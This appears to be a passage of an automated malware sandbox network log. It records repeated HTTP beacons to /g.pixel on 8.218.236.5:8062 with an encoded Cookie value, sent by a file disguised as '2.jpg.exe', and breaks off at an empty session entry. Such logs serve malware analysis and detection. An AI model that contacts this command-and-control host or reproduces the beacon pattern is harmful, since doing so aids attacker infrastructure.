Apr 19, 2024 09:53:12.567059994 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:53:12.882399082 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:53:12 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
247	192.168.2.4	49983	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:53:13.449479103 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:53:13.769648075 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:53:13 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
248	192.168.2.4	49984	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:53:14.757014990 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:53:15.073965073 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:53:14 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
249	192.168.2.4	49985	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:53:15.509558916 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:53:15.826800108 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:53:15 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
250	192.168.2.4	49986	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:53:16.263884068 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:53:16.588251114 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:53:16 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
251	192.168.2.4	49987	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:53:17.036490917 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:53:17.372756004 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:53:17 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
252	192.168.2.4	49988	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:53:17.812802076 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:53:18.140562057 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:53:17 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
253	192.168.2.4	49989	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:53:18.567483902 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:53:18.880848885 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:53:18 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
254	192.168.2.4	49990	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:53:19.302506924 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:53:19.620202065 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:53:19 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
255	192.168.2.4	49991	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:53:20.064766884 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:53:20.393155098 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:53:20 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
256	192.168.2.4	49992	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:53:20.816903114 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:53:21.132951021 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:53:20 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
257	192.168.2.4	49993	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:53:21.557499886 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:53:21.881849051 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:53:21 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
258	192.168.2.4	49994	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:53:22.309899092 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:53:22.635960102 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:53:22 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
259	192.168.2.4	49995	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:53:23.070533037 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:53:23.388683081 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:53:23 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
260	192.168.2.4	49996	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:53:23.834366083 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:53:24.156874895 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:53:23 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
261	192.168.2.4	49997	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:53:24.582694054 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:53:24.897120953 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:53:24 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
262	192.168.2.4	49998	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:53:25.328644037 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:53:25.654896975 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:53:25 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
263	192.168.2.4	49999	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:53:26.107017040 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:53:26.446506023 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:53:26 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
264	192.168.2.4	50000	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:53:26.899646997 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:53:27.236583948 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:53:27 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
265	192.168.2.4	50001	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:53:27.661407948 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:53:27.977720022 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:53:27 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
266	192.168.2.4	50002	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:53:28.418477058 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:53:28.742216110 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:53:28 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
267	192.168.2.4	50003	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:53:29.165512085 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:53:29.486670971 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:53:29 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
268	192.168.2.4	50004	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:53:29.937937021 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:53:30.265085936 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:53:30 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
269	192.168.2.4	50005	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:53:30.692105055 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:53:31.007297993 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:53:30 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
270	192.168.2.4	50006	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:53:31.426924944 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:53:31.743675947 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:53:31 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
271	192.168.2.4	50007	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:53:32.175374985 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:53:32.490583897 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:53:32 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
272	192.168.2.4	50008	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:53:32.908144951 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:53:33.222275019 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:53:33 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
273	192.168.2.4	50009	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:53:33.656843901 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:53:33.986576080 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:53:33 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
274	192.168.2.4	50010	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:53:34.420092106 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:53:34.742708921 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:53:34 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
275	192.168.2.4	50011	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
